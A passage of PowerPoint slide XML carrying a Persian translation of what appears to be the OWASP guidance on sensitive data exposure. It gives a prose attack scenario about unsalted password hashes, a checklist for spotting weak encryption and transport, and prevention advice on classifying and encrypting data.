                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>unsalted </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> یا ساده برای ذخیره کلمه عبور استفاده می کند. یک نقص آپلود فایل به مهاجم اجازه می دهد تا رمز عبور پایگاه داده را بازیابی کند. تمام هش های </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>unsaldhed</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>را می توان با یک جدول رنگین کمان از هش های پیش محاسبه شده شکست. هش های تولید شده توسط توابع هش ساده یا سریع ممکن است توسط </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>GPU </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>ها شکسته شوند، حتی اگر از نوع </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> salted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> باشند.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا برنامه کاربردی آسیب‌پذیر است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اولین نکته این است که نیازهای حفاظت از داده ها در هنگام انتقال و در حالت ذخیره تعیین شود. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>به عنوان مثال، گذرواژه‌ها، شماره کارت اعتباری، پرونده‌های بهداشتی، اطلاعات شخصی و اسرار تجاری، حفاظت بیشتری نیاز دارند، به ویژه اگر داده‌ها تحت قوانین حریم خصوصی قرار بگیرند، برای مثال مقررات حفاظت کلی اطلاعات اتحادیه اروپا (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>GDPR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>، </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>یا مقررات، مانند حفاظت از اطلاعات مالی مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PCI Data Security Standard (PCI DSS) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>. برای چنین اطلاعاتی:</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا داده ها بدون رمز شدن ارسال شده اند؟ این مربوط به پروتکل هایی مانند </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>HTTP، SMTP </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>و </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> است. به ویژه ترافیک اینترنتی خارجی خطرناک است. تمام ترافیک داخلی بین </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>load balancer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> ها، وب سرورها، و یا سیستم های</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>back-end</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> بایستی بررسی گردد.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا اطلاعات حساس در متن آشکار ذخیره می شوند، از جمله در پشتیبان متن‌ها؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا الگوریتم‌های رمزنگاری قدیمی یا ضعیف از پیش فرض یا کد قدیمی تر استفاده می کنند؟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا کلید های رمزنگاری پیش فرض در حال استفاده هستند، کلید های رمزنگاری ضعیف تولید شده یا همچنان از آنها استفاده مجدد میشود، یا اینکه  آیا مدیریت کلید مناسب است؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>آیا رمزگذاری اعمال شده است، به عنوان مثال آیا برای هر عامل کاربر (مرورگر) تمهیدات امنیتی اندیشیده شده است یا </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>headers missing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> رخ می‌دهد؟ </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>اگر عامل کاربر (مثلا برنامه کاربردی، سرویس پست الکترونیکی) گواهی سرور صحیحی را دریافت کند آیا آن را تأیید نمی کند؟</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>See ASVS </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>Crypto (V7)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Data </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Prot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> (V9)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>SSL/TLS (V10)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1050" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>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fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>منابع</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fa-IR" sz="1200" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>خارجی</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a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>چگونه ممانعت کنیم؟</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>حداقل موارد زیر را دنبال کنید و به مراجع رجوع کنید: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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داده های پردازش شده، ذخیره شده، و یا ارسال شده توسط یک برنامه را طبقه بندی کنیم. بر اساس قوانین حریم خصوصی، با توجه به الزامات قانونی یا نیازهای تجاری داده های حساس را شناسایی کنید. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="171450" indent="-171450" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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طبق طبقه بندی، کنترل ها را اعمال کنید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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در صورت عدم نیاز داده های حساس را ذخیره نکنید. در اسرع وقت آن را حذف کنید و یا از توافق </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t>PCI DSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fa-IR" sz="1100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
              </a:rPr>
              <a:t> برای علامتگذاری یا حتی ناقص سازی استفاده کنید. داده هایی که ذخیره نمی شوند نمی توانند سرقت شوند.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2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اطمینان حاصل کنید که همه اطلاعات حساس در حالت ذخیره را رمزگذاری کرده‌اید.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="B Nazanin" panose="00000400000000000000" pitchFamily="2" charset="-78"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="82550" indent="-82550" algn="just" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
